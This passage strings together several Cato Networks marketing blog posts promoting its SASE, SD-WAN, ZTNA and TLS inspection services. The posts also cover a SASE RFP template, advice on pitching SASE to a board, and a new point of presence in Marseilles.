Nor does edge SD-WAN help. There’s no security built into edge SD-WAN, so you haven’t addressed that problem. There’s also no private global network so you’re still reliant on MPLS for predicable connectivity. Edge SD-WAN solutions also require the cost and complexity of deploying additional edge SD-WAN appliances to connect to the Azure cloud. And, again, none of this helps with mobile users, which are also out of scope for edge SD-WAN.
[boxlink link="https://www.catonetworks.com/resources/migrating-your-datacenter-firewall-to-the-cloud/?utm_source=blog&utm_medium=top_cta&utm_campaign=cloud_datacenter"] Migrating your Datacenter Firewall to the Cloud | Download eBook [/boxlink]
How Azure SD-WAN Works to Connect Cato and Azure
Cato addresses all of the connectivity and security challenges of Azure SD-WAN. Cato’s global private backbone spans more than 75+ points of presence (PoPs) across the globe, providing affordable premium connectivity worldwide. Many of those Cato PoPs collocate within the same physical datacenters as entrance points to Azure. Connecting from Azure to Cato is only matter of crossing a fast, LAN connection, giving Cato customers ExpressRoute-like performance at no additional charge.
To take advantage of Cato’s unique approach, Cato customers do two things. First, to connect Cato and Azure, enterprises take advantage of our agentless configuration, establishing IPsec tunnels between the two services, establishing the PoP as the egress point for Azure traffic. There’s no need to deploy additional agents or virtual appliances. Cato’s will then optimize and route Azure traffic from any Cato PoP along the shortest and fastest path across Cato Cloud to destination PoP.
Second, sites and mobile users send their Azure traffic to Cato by establishing encrypted tunnels across any Internet connection to the nearest Cato PoP. Sites will run a Cato Socket, Cato’s SD-WAN appliance or establish IPsec tunnels from an existing third-party security device, and mobile users run the Cato mobile client on their devices.
Alternatively, if you’d like to leverage all of Cato’s SD-WAN capabilities in Azure, you can easily deploy Cato’s virtual socket instead of IPsec tunnels, which includes automatic PoP selection, high availability, and automatic failover. The beauty of Cato’s virtual socket is that you can easily deploy it in minutes instead of hours. To get started with Cato virtual socket, search for Cato Networks in the Azure marketplace. Then, click Get It Now, and follow the outlined configuration guidelines.
How Azure SD-WAN Secures Azure Resources
In addition to connectivity, Cato’s Azure SD-WAN solution secures cloud resources against network-based threats. Every Cato PoP provides Cato’s complete suite of security services, eliminating the need for backhauling.
Cato Security as a Service is a fully managed suite of enterprise-grade and agile network security capabilities, that currently includes application-aware next-generation firewall-as-a-Service (FWaaS), secure web gateway with URL filtering (SWG), standard and next-generation anti-malware (NGAM), IPS-as-a-Service (IPS), and Cloud Access Security Broker (CASB). Cato can further secure your network with a comprehensive Managed Threat Detection and Response (MDR) service to detect compromised endpoints.
Azure instances and all resources connected to Cato, including site, mobile users and other cloud resources, are protected through a common set of security policies, avoiding the complexity that comes with purchasing security tools unique to Azure or other cloud environments.
Azure SD-WAN Benefits
The bottom line is that Azure SD-WAN delivers connectivity and security with minimal complexity and cost:
Superior Microsoft Azure performance
The combination of global Cato PoPs, a global private backbone and Microsoft Azure colocation accelerates Microsoft Azure application performance by up to 20X vs. a typical corporate Internet-based connection. Not only is latency minimized but Cato’s built-in network optimizations further improve data transfer throughput. And all of that is done for branch offices as well as mobile users. The result is a superior user experience without the need for premium cloud provider transport services.
Security and deployment simplicity
With Cato, organizations don’t have to size, procure and manage scores of branch security solutions normally needed for the direct Internet access critical to delivering low latency cloud connectivity. Security is built into Cato Cloud; cloud resources are protected by the same security policy set as any other resource or user on the enterprise backbone. Cato’s agentless configuration also means customers don’t have to install additional SD-WAN appliances in the Azure cloud. These benefits are particularly significant for multi-cloud enabled organizations which normally would require separate connectivity solutions for each private datacenter service. (However, if you’d like to leverage additional capabilities in Azure, you can deploy the integration in minutes with Cato’s virtual Socket.)
Networking and security agility
Cato’s SD-WAN’s simplicity, Azure integration, and built-in security stack enable branch offices and mobile users to get connected to Microsoft Azure in minutes or hours vs. weeks or months for branch office appliance-based SD-WAN.
Affordable and fast ROI
Enterprises get superior cloud performance without paying for the high-cost cost of branch office SD-WAN hardware, carrier SD-WAN services, or Microsoft Azure ExpressRoute transport. Nor do companies need to invest in additional security services to protect cloud resources with Cato.
For more information on how Cato integrates with the cloud, contact Cato Networks or check out this eBook on Migrating your Datacenter Firewall to the Cloud.
Why do you need a SASE RFP? Shopping for a SASE solution isn’t as easy as it sounds… SASE is an enterprise networking and security...
The Only SASE RFP Template You’ll Ever Need Why do you need a SASE RFP?
Shopping for a SASE solution isn’t as easy as it sounds... SASE is an enterprise networking and security framework that is relatively new to the enterprise IT market (introduced by Gartner in 2019.) And less than 3 years young, SASE is often prone to misunderstanding and vendor “marketecture.” Meaning: If you don’t ask the right questions during your sales and vendor evaluation process, you may be locked into a solution that doesn’t align with your current and future business and technology needs.
A Quick Note about Cato’s RFP Template
Do a quick Google search and you’ll find millions of general RFP templates. That being said, Cato’s RFP template only covers the functional requirements of a future SASE deployment. There are no generic RFP requirements in our template, like getting the vendor details of your vendor companies.
So, What Must a SASE RFP Template Include?
Cato Networks has created a comprehensive, 13-page SASE RFP template, which contains all business and functional requirements for a full SASE deployment. Just download the template, fill in the relevant sections to your enterprise, and allow your short-listed vendors to fill in the remainder. While you may see some sections that are not relevant to your particular organization or use case, that's all right. It’s available for your reference, and to help you plan any future projects.
A Sneak Peek at Cato’s RFP Template
If you’d like a preview of Cato Networks’ SASE RFP template, we’re providing you with a high-level outline. Take a look at this "quick-guide", and then download the full SASE RFP template to put it into practice.
[boxlink link="https://www.catonetworks.com/resources/sase-rfi-rfp-template/?utm_source=blog&utm_medium=top_cta&utm_campaign=sase_rfp_template"] SASE RFI/RFP Made Easy | Get the Template [/boxlink]
1. Business and IT overview
You’ll describe your business and IT. Make sure to include enough details for vendors to understand your environment so they can tailor their answers to your specific needs and answer why their solution is valuable to your use case.
2. Solution Architecture
Understand your proposed vendors architecture, what the architecture includes, what it does and where it is placed (branch, device, cloud.) Comprehending vendor architecture will allow you to better determine how a vendor scales, how they address failures, deliver resiliency, etc.
3. Solution Capabilities
Deep dive into your proposed vendor functionalities. The idea is to select all selections relevant to your proposed SASE deployment, and have the vendor fill them out.
Receive a thorough exploration of a proposed vendor’s SD-WAN offering, covering link management, traffic routing and QoS, voice and latency-sensitive traffic, throughput and edge devices, monitoring and reporting, site provisioning, gradual deployment / co-existence with legacy MPLS networks.
Understand traffic encryption, threat prevention, threat detection, branch, cloud and mobile security, identity and user awareness, policy management and enforcement, as well as security management analytics and reporting.
Determine vendor components needed to connect a cloud datacenter to the network, amongst other areas.
Mobile (SDP / ZTNA)
Understand how vendors connect a mobile user to the network, their available mobile solutions for connecting mobile users to WAN and cloud, and other key areas.
Explore your vendor’s global traffic optimization, describe how they optime network support to mobile users, and more.
4. Support and Services
Evaluate service offering and managed services. This is the perfect time to ask and understand whether your proposed vendor uses “follow-the-sun" support models and decide whether you want a self-managed, fully managed, or co-managed service.
Support and Professional services
Understand if vendors abide by “follow-the-sun,” support, their hours of support and more.
Get a sense of vendor managed services in several key areas.
Next Steps: Get the Full SASE RFP / RFI Template
Whether you’re new to SASE or a seasoned expert, successful SASE vendor selection starts with asking the right questions. When you know the correct questions to ask, it’s easy to understand if a SASE offering can meet the needs of your organization both now and in the future. Download Cato Network’s full SASE RFP / RFI Made Easy Template, to begin your SASE success story.
Zero trust network access (ZTNA) is an integral part of an enterprise security strategy, as companies move to adopt zero trust security principles and adapt...
Don’t Ruin ZTNA by Planning for the Past Zero trust network access (ZTNA) is an integral part of an enterprise security strategy, as companies move to adopt zero trust security principles and adapt to more distributed IT environments. Legacy solutions such as virtual private networks (VPNs) are ill-suited to the distributed enterprise and do not provide the granular access controls necessary to protect an organization against modern cyber threats.
However, not all ZTNA solutions are created equal. In some cases, ZTNA solutions are designed for legacy environments where employees and corporate resources are located on the corporate LAN. Deploying the wrong ZTNA solution can result in tradeoffs between network performance and security.
Where ZTNA Can Go Wrong
Three of the primary ways in which ZTNA goes wrong are self-hosted solutions, web-only solutions, and solutions only offering agent-based deployments.
Some ZTNA solutions are designed to be self-hosted or self-managed. An organization can deploy a virtual ZTNA solution on-prem or in the cloud and configure it to manage access to the corporate resources hosted at that location.
These self-hosted ZTNA solutions are designed based on a perimeter-focused security model that no longer meets the needs of an organization’s IT assets. Self-hosted ZTNA is best suited to protecting locations where the virtual appliance can be deployed, such as in an on-prem data center or an Infrastructure as a Service (IaaS) cloud service.
However, many organizations use a variety of cloud services, including Software as a Service (SaaS) offerings where a self-hosted ZTNA solution cannot be easily deployed. This and the fact that expanding self-hosted ZTNA to support new sites requires additional solutions or inefficient routing, means that these solutions are less usable and offer lower network performance than a cloud-native solution.
Often, security programs focus too much on the more visible aspects of an organization’s IT infrastructure. Web security focuses on websites and web apps instead of APIs, and ZTNA is targeted toward the protection of enterprise web apps.
However, companies commonly use various non-web applications as well. For example, companies may want to provide access to corporate databases, remote access protocols such as SSH and RDP, virtual desktop infrastructure (VDI), and other applications that do not run over HTTP(S).
A ZTNA solution needs to provide support for all apps used by an enterprise. This includes the ability to manage access to both web and non-web enterprise applications.
[boxlink link="https://www.catonetworks.com/resources/ztna-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=ztna_demo"] Secure zero trust access to any user in minutes | ZTNA Demo [/boxlink]
Only Agent-Based Deployment
Some ZTNA solutions are implemented using agents that are deployed on each user’s endpoint. These agents interact with a self-hosted or cloud-based broker that allows or denies access to corporate resources based on role-based access controls. By using agents, a ZTNA solution can provide a more frictionless experience to users.
While an agent-based deployment has its benefits, it may not be a fit for all devices. The shift to remote and hybrid work has driven the expanded adoption of bring your own device (BYOD) policies and the use of mobile devices for work. These devices may not be able to support ZTNA agents, making it more difficult to manage users’ access on these devices.
Support for agent-based deployments can be a significant asset for a ZTNA solution. However, implementing ZTNA only via agents deployed on the endpoint can result in some devices being unable to access corporate resources or being forced to use workarounds that could degrade performance or security.
Choose the Right ZTNA Solution
ZTNA provides a superior alternative to VPNs for secure remote access. However, the success of an organization’s ZTNA deployment can depend on selecting and deploying the right ZTNA solution.
Some key requirements to look for when evaluating ZTNA solutions include:
Globally Distributed Service: ZTNA solutions that are self-managed and can only be deployed in certain locations create tradeoffs between the performance and security of corporate applications. A ZTNA solution should be responsive everywhere so that employees can easily access corporate resources hosted anywhere, which can only be achieved by a globally distributed, cloud hosted, ZTNA solution.
Wide Protocol Support: Many of the most visible applications used by companies are web-based (webmail, cloud-based data storage, etc.). However, other critical applications may use different protocols yet have the same need for strong, integrated access management. A ZTNA solution should offer support for a wide range of network protocols, not just HTTP(S).
Agentless Option: Agent-based ZTNA solutions can help to achieve better performing and more secure remote access management; however, they are not suitable for all devices and use cases. A ZTNA solution should offer both agent-based and agentless options for access management.
Cato SASE Cloud offers ZTNA as part of an integrated Secure Access Service Edge (SASE) solution. By moving access control and other security and network optimization functions to cloud-based solutions, Cato SASE Cloud ensures that ZTNA services are accessible from anywhere and support a range of protocols. Also, with both agent-based and agentless options, Cato SASE Cloud ensures that all users have the ability to efficiently access corporate resources.
Introduction: Discussing Transformation with the Board Technology is a strategic requirement for every global organization and its board of directors, regardless of industry. No one...
Talking SASE to Your Board: A CIO’s Guide to Getting to ‘Yes’ Introduction: Discussing Transformation with the Board
Technology is a strategic requirement for every global organization and its board of directors, regardless of industry. No one is immune from the machinations of technological evolution and the associated disruption that follows. As a result, we can no longer separate business strategy from technology strategy, forcing corporate boards to converge their decision-making processes around a strategic agenda of innovation and risk-mitigation. So, CIOs must take an innovative approach when discussing any transformational change with the board.
How to Position Network Transformation to the Board
Network transformation is a game-changing strategy that helps drive business growth and market acquisition. So, if not positioned effectively to address board-level concerns, it will impact the long-term ability to execute and advance business objectives. When addressing the board, CIOs must position such technology strategies with critical board-level concerns in mind and discuss them in the context of:
Can this strategy help us improve IT responsiveness and ability to support business growth?
What value will the business realize through this initiative?
What is the security impact of this strategy on our critical applications?
How would this strategy enable IT organizations to better mitigate increasing security risk?
What would be the short- and long-term financial impact of this initiative?
What is the impact of our current and next-gen IT talent?
Core to discussing these strategies is articulating the necessity of simplification, optimization, and risk-mitigation in delivering business outcomes through network transformation. And this is where Secure Access Service Edge (SASE) becomes that strategic conversation for board-level engagement.
[boxlink link="https://www.catonetworks.com/resources/your-first-100-days-as-cio-5-steps-to-success/?utm_source=blog&utm_medium=top_cta&utm_campaign=first_100_days_cio"] Your First 100 Days as CIO: 5 Steps to Success | EBOOK [/boxlink]
SASE is the network transformation strategy that addresses board-level concerns around risk, growth, and financial flexibility. SASE converges networking and security capabilities into a single high-performing cloud-native architecture that allows organizations to scale core business operations through efficiency and performance, while extending consistency in policy and protections. So, presenting a SASE strategy to the board requires CIOs to be crisp and clear when highlighting key business benefits.
[caption id="attachment_25242" align="alignnone" width="724"] Figure 1[/caption]
A Conversational Guide to Engaging the Board on SASE
In February 2019, Deloitte defined a 3-dimension conversation model for CIOs when engaging technology boards. This engagement model defines the thought processes of board members when evaluating technology initiatives for sustaining business growth and maximizing balance sheets.
[caption id="attachment_25244" align="alignnone" width="724"] Figure 2[/caption]
To influence the board’s decision-making process, CIOs can lean on this model to guide their discussion of SASE’s positive impact on business growth and sustainability. While SASE may not speak specifically to each sub-dimension of the Deloitte model, the core focus on Strategy, Risk and Financial Performance can be adapted as a conversation guide when discussing SASE and Network Transformation.
Highlight the Strategic Value of SASE
Disruptive technology drives business growth and market share acquisition. However, CIOs should emphasize SASE not as a disruptive technology, rather as a disruptive approach to existing technologies. When positioning SASE to boards, CIOs should emphasize the strategic potential of SASE’s disruptive approach to simplifying network operations, which by extension, accelerates business growth.
CIOs must articulate the strategic business benefits of converging networking and security functions into a single cloud-native software stack with unlimited scalability to support business growth. An obvious benefit is how SASE accelerates and optimizes access to critical applications, enhancing the collection, analysis, and securing of data, while improving user experiences and efficiency. Another benefit is how SASE eliminates scaling challenges when more capacity is required to service business growth and expansion.
An imperative for CIOs is to highlight use cases where SASE proves its strategic value across the entire enterprise. Successful SASE implementations makes it easier to pursue Cloud Migration, Work-From-Home (WFH), UCaaS, and Global Expansion projects, just to name a few. Through these, we observe how SASE not only eliminates networking and security headaches, but it also streamlines the efforts of IT teams, allowing them to place more focus on these strategic initiatives. SASE has now become that true platform for digital transformation and an enabler of business growth.
In short, CIOs must emphasize how SASE enables the network to scale at the speed of business, instead of the business being limited by the rigid, inflexibility of the network. This approach allows CIOs to demonstrate SASE’s strategic value to the overall business by removing technical challenges that limit growth.
SASE as a disruptive approach to simplifying network operations
SASE as a “Growth Enabler” – optimized access improves business operations
Unlimited scalability at the speed of business
[caption id="attachment_25250" align="alignnone" width="724"] Figure 3[/caption]
Present the Risk-mitigation Value of SASE
No one is immune to cyber risk, and boards will naturally question cyber readiness for critical projects that support business growth. Typically, discussions around risk are fragmented along network support for new initiatives, and security risk to data and privacy. This overlooks the obvious linkage between the two, but SASE allows CIOs to blend these conversations to address critical board-level concerns.
Considering this, presenting the risk-mitigation value of SASE requires CIOs to address a key imperative of most boards – SASE must help overcome increased complexity and mitigate cyber risks today and well into the future.
Years of acquiring point products to solve point problems have bloated technology environments, resulting in security blind spots, increased complexity, and unmanageable risk. SASE proves its risk mitigation value by simplifying protection schemes, increasing visibility, improving threat detection and response, unifying security policies, and facilitating easier auditing. CIOs must also emphasize SASE’s simplistic Zero-Trust access approach to critical applications, delivering consistent policy enforcement across the entire network.
Finally, CIO’s must outline how SASE enable organizations to meet regulatory and compliance mandates and policies. This conversational approach re-enforces SASE’s risk-mitigation value and alleviates one of the biggest board-level concerns – the risk of ransomware and business disruption.
Highlight cyber risks without SASE –complexity, blind spots, and reputation loss
Risk Mitigation value – holistic data protection schemes
True SASE is a platform that enables compliance mandates
[caption id="attachment_25252" align="alignnone" width="724"] Figure 4[/caption]
Discuss SASE as a Financial Performance Enabler
Boards are laser-focused on the long-term financial performance goals of the business. The board needs to understand how network transformation will improve their balance sheets and customer retention. While many CIOs hesitate to link technology investments to financial performance metrics, articulating the positive impact of SASE on financial performance can position it as an ROI-enabler.
In our whitepaper, “ROI of Doing Nothing”, we highlight the long-term financial impact of delaying network transformation with SASE. Becoming a Stage 1 company – transition early to anticipate challenges vs. being a Stage 2 company – delay results in increased requirements and subsequent costs, comes down to the overall financial burden organizations are prepared to withstand. CIOs must promote the positive ROI of SASE in securing the long-term financial structure of the business.
When evaluating the feasibility of network transformation with SASE, CIOs must speak to the business and talent efficiencies to be gained. Today, most enterprises exhaust considerable resources running and maintaining inefficient infrastructures. This often produces outages across the network, which impacts operations across the entire business. The financial impact of this is not only measured in maintenance contracts and renewal/upgrade fees, but also in application availability, performance, and scalability.
SASE reduces costs by retiring expensive and inefficient systems, and this also directly impacts their IT talent performance. Similar to the strategic value, less time spent on mundane technical support activities enables IT teams to direct their support efforts towards strategic, revenue-generating initiatives. This increases revenue generated per-head, thus improving the operational cost model.
Highlighting key performance metrics related to revenue and ROI will gain broad consensus for SASE projects. Mapping key performance requirements into business ROI gained via SASE, demonstrates how it not only transforms networking and security, but also overall IT and business operations that impact the bottom-line.
SASE as an ROI enabler – lower TCO
Delaying SASE – impacts long-term cost structures
IT support for revenue-generating initiatives
[caption id="attachment_25254" align="alignnone" width="724"] Figure 5[/caption]
A SASE Engagement Model Allows for CIO-Board Partnership
Justifying network transformation can be challenging considering it requires a paradigm shift towards a new way of viewing IT operations and its impact on the broader business. By following a simple board-level engagement model focusing on Strategy, Risk and Performance, CIOs can build a more compelling discussion on the numerous advantages in SASE that extend far beyond simple network and security efficiencies. It is important to develop that CIO-Board partnership that explores these through a business outcome lens. SASE pursued with strategic business enablement in mind alleviates the key board-level concerns, while empowering CIOs to deliver the resilient, cost-effective converged platform that enables optimal IT operations, mitigates risk, and produces long-term ROI.
Engaging the board on new technology approaches such as SASE does not have to be scary. SASE provides a new way to envision the Digital Infrastructure of the Future, and highlighting the main concerns of most board members, is the most direct approach to discuss this topic. This writing provides a simple guide for mapping board-level concerns to the intrinsic advantages of SASE, while providing a roadmap to realizing the key benefits.
To learn more about how CIO’s succeed in this digital era, download our “First 100 Days as a CIO” guide.
Cato just announced the opening of our new PoP in Marseilles, France. Marseilles is our second PoP in France (Paris being the first) and our...
Cato Expands to Marseilles and Improves Resiliency Within France Cato just announced the opening of our new PoP in Marseilles, France. Marseilles is our second PoP in France (Paris being the first) and our 20th in EMEA. Overall, Cato SASE Cloud is comprised of 70+ PoPs worldwide, bringing Cato’s capabilities to more than 150 countries.
As with all our PoPs, Marseilles isn’t just a “gateway” that secures traffic to and from the Internet. Cato PoPs are far more powerful. Like the rest of our PoPs, Marseilles will run Cato's Single Pass Cloud Engine (SPACE), Cato's converged cloud-native software. Cato SPACE provides enterprise-grade threat prevention, data protection, and global traffic optimization for East-West traffic to other Cato PoPs and North-South traffic to the Internet or the cloud.
Cato SPACE sets speed records in the SASE world by processing up to 3 Gbps of traffic per site with full decryption and all security engines active at line rate. Cato SPACE is so effective and reliable, that enterprises can replace legacy MPLS networks and security appliances.
The Marseilles PoP, like all of our PoPs, is equipped with multiple compute nodes running many SPACE engines. When a site’s traffic hits the Marseilles PoP, the traffic flow is immediately assigned to the most available SPACE engine.
Should a SPACE engine fail within a PoP, flows are automatically processed by another SPACE instance. Should the datacenter hosting a Cato PoP fail, users and resources automatically reconnect to the next available PoP as all PoPs are equipped with enough surplus capacity to accommodate the additional load.
[boxlink link="https://www.catonetworks.com/news/cato-networks-strengthens-sase-presence-in-france-with-new-point-of-presence-pop-in-marseilles/?utm_source=blog&utm_medium=top_cta&utm_campaign=marseilles_pop_pr"] Cato Networks Strengthens SASE Presence in France with New Point of Presence (PoP) in Marseilles | News Release [/boxlink]
A case in point was the recent Interxion datacenter outage. The datacenter housed the London Metal Exchange and Cato's London PoP. The outage disrupted the Exchange for nearly five hours. Cato customers were also impacted – for 30 seconds – as London-connected sites, and users automatically and transparently moved over to Cato's Manchester and Dublin PoPs. In the case of Marseilles, Cato's self-healing architecture automatically and transparently moves sites and users to the next best PoP, likely the one in Paris.
"Before Cato, there were outages, complaints, and negative feedback from several internal teams about the service from our major international MPLS provider," said Thomas Chejfec, Group CIO of Haulotte, a global manufacturer of materials and people lifting equipment. Haulotte moved to Cato after facing three years of delays and cost overruns, rolling out MPLS to its more than 30 offices across Western Europe, North America, South America, Africa, and Asia Pacific. "Since deploying Cato, the network is no longer a topic of discussion with users," says Chejfec. "We never hear about it anymore."
Of course, delivering a great cloud platform means having great partners. Cato's complete range of networking and security capabilities are available today from numerous partners across France, including Ava6, ADVENS, Anetys, Hexanet, IMS Networks, OCD, NEOVAD, Nomios, Rampar, Sasety, and Selceon.
Cato continues to work hard to deliver and grow our global network. Marseilles is our latest launch, but hardly our last. Expect us to continue adding PoPs and growing our global footprint so you can connect and secure your offices and users wherever they may be located.
TLS or Transport Layer Security is the evolution of SSL, and the terms are often used interchangeably. TLS is designed to increase security by encrypting...
Don’t Turn a Blind Eye to TLS Traffic TLS or Transport Layer Security is the evolution of SSL, and the terms are often used interchangeably. TLS is designed to increase security by encrypting data end-to-end between two points, ideally preventing bad actors from having visibility into the traffic of your web session. However, threat actors have also come to see the value in utilizing TLS encryption for delivering malware and evading security controls.
This can be indirect via the leveraging common sanctioned SaaS applications (Office365, Box, Dropbox, GDrive, etc.) as delivery vectors or direct by using free certificates from Let’s Encrypt. Let’s Encrypt is a free and open certificate authority created and run for the benefit of the public. Despite being designed for good, threat actors wasted no time in leveraging the advantages of free encryption in their activities.
The point here is that most traffic, good and bad, is now TLS encrypted and can create challenges for IT and security teams.
TLS Inspection to the Rescue
TLS inspection is almost completely transparent to the end-user and sits between the user and their web applications. Like the malicious activity known as a man-in-the-middle attack, TLS inspection intercepts the traffic, enabling inspection by security engines. For this to work without disruption to the end-user, an appropriate certificate must be installed on the client device.
TLS inspection has been available for some time now but isn’t widely used due to a variety of reasons, primarily cost and complexity. Historically NGFW or other appliances have been the source of TLS inspection capabilities for organizations. With any appliance, there is a fixed amount of capability, and the more features you enable, the lower the throughput. TLS inspection is no different and often requires double (or more) hardware investment to accomplish at scale. Additionally, TLS inspection brings up privacy concerns about financial and health information that are not always easily addressed by legacy products.
[boxlink link="https://www.catonetworks.com/resources/tls-decryption-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=tls_demo"] Cato Demo | TLS Inspection in Minutes [/boxlink]
SASE Makes it Possible
SASE or Secure Access Service Edge removes most of the challenges around TLS decryption, allowing organizations to secure their users and locations more effectively. SASE offers TLS inspection capabilities as product functionality, with no need to size and deploy hardware. Simply create desired exceptions (or alternatively specify what traffic to inspect), deploy certificates to endpoints, and enable the feature. This easy alternative to NGFW TLS decryption makes it possible for organizations to gain visibility into the 95% of their traffic that is hiding in TLS. There are still some challenges, primarily certificate pinned websites and applications. Most SASE providers will manage a bypass list of these for you, but you can always improve your security posture by blocking un-inspectable traffic where it makes sense.
Gain Visibility Today
The question remains, if you are not inspecting TLS today, why aren’t you? You have most likely invested in security technologies such as IPS, CASB, SWG, Next-Generation Antimalware, DLP, etc., but without complete visibility, these tools cannot work effectively. Security engines are a bit like the x-ray machine at airport security, they reveal the contents of luggage (packets) to identify anything bad. Now imagine if you are in the security line and they are only inspecting 5 out of every 100 bags. How secure does this make you feel, would you still get on the plane?
SASE has removed many of the obstacles to adopting TLS inspection and provides complete visibility to all security engines to maximize their value. If you have not considered SASE yet, now may be the time. If you already have SASE and do not know where to start with TLS inspection, start small. You should be able to selectively enable the capability for risky categories of URLs and applications and then increase the scope as your comfort level grows.
See this quick video demo on how easy it is to enable TLS inspection with Cato Networks!
In the past, most of an organization’s employee and IT resources were located on the enterprise LAN. As a result, enterprise security models were focused...
Planning for the Distributed Enterprise of the Future In the past, most of an organization’s employee and IT resources were located on the enterprise LAN. As a result, enterprise security models were focused on defending the perimeter of the corporate network against external threats. However, the face of the modern enterprise is changing rapidly. Both users and IT resources are moving off of the corporate LAN, creating new employee and service network edges.
Distributed Employee Edges
The most visible sign of the evolution of the modern enterprise is the growing acceptance of remote work. Employees working remotely is nothing new, even for organizations without formal telework programs. Business travel, corporate smartphones, and other factors have led to corporate data and resources being accessed from outside the enterprise network, often without proper support or security.
The pandemic normalized remote work as businesses found that their employees could effectively work from basically anywhere. In fact, many businesses found that remote work increased productivity and decreased overhead. As a result, many businesses plan to support at least hybrid work indefinitely, and telework has become a common incentive for hiring and retaining employees.
Scattered Service Locations
While the rapid growth and distribution of employee edges can be attributed to the pandemic, service edges have been expanding for years. The emergence of cloud-based data storage and application hosting has transformed how many organizations do business.
The cloud provides numerous benefits, but one of its major selling points is the wide range of service options that organizations can take advantage of. Companies can move enterprise data to a cloud data center, outsource infrastructure management to a third-party provider for hosted applications, or take advantage of Software as a Service (SaaS) applications that are developed and hosted by their cloud service provider.
Nearly all organizations use at least some cloud services, even if this is simply cloud-based email and data storage (G-Suite, Microsoft 365, etc.). However, many companies have not completely given up their on-prem infrastructure, hosting some data and applications locally to meet business needs or regulatory compliance requirements.
This mix of on-prem and cloud-based infrastructure complicates the corporate WAN. Both on-site and remote workers need high-performance, reliable, and secure access to corporate data and applications, regardless of where the user and application are located.
[boxlink link="https://www.catonetworks.com/resources/how-three-enterprises-delivered-remote-access-everywhere/?utm_source=blog&utm_medium=top_cta&utm_campaign=3_enterprises_delivered_remote_access"] How Three Enterprises Delivered Remote Access Everywhere | EBOOK [/boxlink]
Legacy Infrastructure Doesn’t Meet Modern Needs
Many organizations’ security models were designed for the era where employees and corporate IT assets were centralized on the corporate LAN. By deploying security solutions at the perimeter of the corporate network, organizations attempt to detect inbound threats and outbound data exfiltration before they pose a threat to the organization.
The perimeter-focused security model has many shortcomings, but one of the most significant is that it is designed for an IT infrastructure that no longer exists. With the expansion of telework and cloud computing, a growing percentage of an organization’s IT assets are now located outside the protected perimeter of the corporate LAN.
A major challenge that companies face when adapting to the growing distribution of their IT assets is that many of the tools that they are trying to use to do so are designed for the same outdated model. For example, virtual private networks (VPNs) were designed to provide point-to-point secure connectivity, such as between a remote worker and the enterprise network. This design doesn’t work when employees need secure access to resources hosted in various places (on-prem, cloud, etc.)
Trying to support a distributed workforce with legacy solutions creates significant challenges for an organization. VPNs’ design and lack of built-in security and access control result in companies routing all traffic through the corporate network for inspection, resulting in increased latency and degraded performance. It also creates challenges for IT personnel, who need to deploy and maintain complex and inflexible VPN-based corporate WANs.
ZTNA Enables Usable, Scalable Security
As companies’ workforces and infrastructure become more distributed, attempting to make the corporate WAN work with legacy solutions is not a sustainable long-term plan. A switch away from perimeter-focused technologies like VPNs is essential to the performance, reliability, and security of the enterprise network.
Zero trust network access (ZTNA) offers a superior alternative to VPNs that is better suited to the needs of the distributed enterprise of the future. Some advantages of a cloud-based ZTNA deployment include:
Global Accessibility: ZTNA can be hosted in the cloud, making it globally accessible. Once access decisions are made, traffic can be routed directly to its destination without a detour through the corporate network.
Granular Access Controls: VPNs are designed to provide legitimate users with unrestricted access to corporate resources. ZTNA provides access to a specific resource on a case-by-case basis, enabling more granular access management and better enforcement of least privilege.
Centralized Management: A VPN-based WAN for an organization with multiple sites and cloud-based infrastructure requires many independent links between different sites. ZTNA does not require these independent tunnels and can be centrally monitored and managed, simplifying network and security configuration and management.
Private Backbone: Cato’s ZTNA uses a private backbone to route traffic between sites. This improves the performance and reliability of network traffic beyond what is possible with the public Internet.
Solutions like VPNs are designed for an IT architecture that no longer exists and never will again. As companies adopt cloud computing and remote work they need infrastructure and security solutions designed for a distributed IT architecture. By deploying ZTNA with Cato, companies can improve network performance and security while simplifying management.
Zero-trust network access (ZTNA) is a superior remote access solution compared to virtual private networks (VPNs) and other legacy tools. However, many organizations are still...
Overcoming ZTNA Deployment Challenges with the Right Solution Zero-trust network access (ZTNA) is a superior remote access solution compared to virtual private networks (VPNs) and other legacy tools. However, many organizations are still relying on insecure and non-performant solutions rather than making the switch to ZTNA.
Why You Might Not Be Using ZTNA (But Should Be)
Often, companies have legitimate reasons for not adopting ZTNA - and below we take a closer look at some of the most common concerns:
“A VPN is Good Enough”
One of the simplest reasons why an organization may not want to upgrade their VPN to ZTNA is that they’ve always used a VPN and it has worked for them. If remote users can connect to the resources that they need, then it may be difficult to make a compelling case for a switch. However, even if an organization’s VPN infrastructure is performing well, there is still security to consider.
A VPN is designed to provide a remote user with unrestricted, private access to the corporate network. This means that VPNs lack application-level access controls and integrated security. For this reason, cybercriminals commonly target VPNs because a single set of compromised credentials can provide all of the access needed for a data breach, ransomware infection, or other attacks.
In contrast, ZTNA provides access on a case-by-case basis decided based on user and application-level access controls. If an attacker compromises a user’s account, then their access and the damage that they can do is limited by that user’s permissions.
“ZTNA is Hard to Deploy”
Deploying a new security solution can be a headache for an organization’s security team. They need to integrate it into an organization’s existing architecture, design a deployment process that limits business disruption, and perform ongoing configuration and testing to ensure that the solution works as designed. When an organization has a working VPN solution, then the overhead associated with switching to ZTNA may not seem worth the effort.
While installing ZTNA as a standalone solution may be complex, deploying it as part of a Secure Access Service Edge (SASE) solution can streamline the process. With a managed SASE solution, deployment only requires pointing infrastructure to the nearest SASE point of presence (PoP) and implementing the required access controls.
[boxlink link="https://www.catonetworks.com/resources/ztna-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=ztna_demo"] Secure zero trust access to any user in minutes | ZTNA Demo [/boxlink]
“VPNs are Required for Compliance”
Most companies are subject to various data protection and industry regulations. Often, these regulations mandate that an organization have certain security controls in place and may recommend particular solutions. For secure remote access, VPNs are commonly on the list of acceptable solutions due to their age and widespread adoption.
However, regulations are changing rapidly, and the limitations of VPNs are well known. As regulators start looking for and mandating a zero-trust approach to security within organizations, solutions like VPNs, which are not designed for zero trust, will be phased out of regulatory guidance.
While regulations still allow VPNs, many also either explicitly recommend ZTNA or allow alternative solutions that implement the required security controls. ZTNA provides all of the same functionality as VPNs but also offers integrated access control. When deployed as part of a SASE solution, ZTNA is an even better fit for regulatory requirements due to its integration with other required security controls and adoption of a least privileges methodology commonly required by regulatory frameworks such as UK NCSC Cyber Essentials and NIST. For organizations looking to achieve and maintain compliance with applicable regulations, making the move to ZTNA as soon as possible will decrease the cost and effort of doing so.
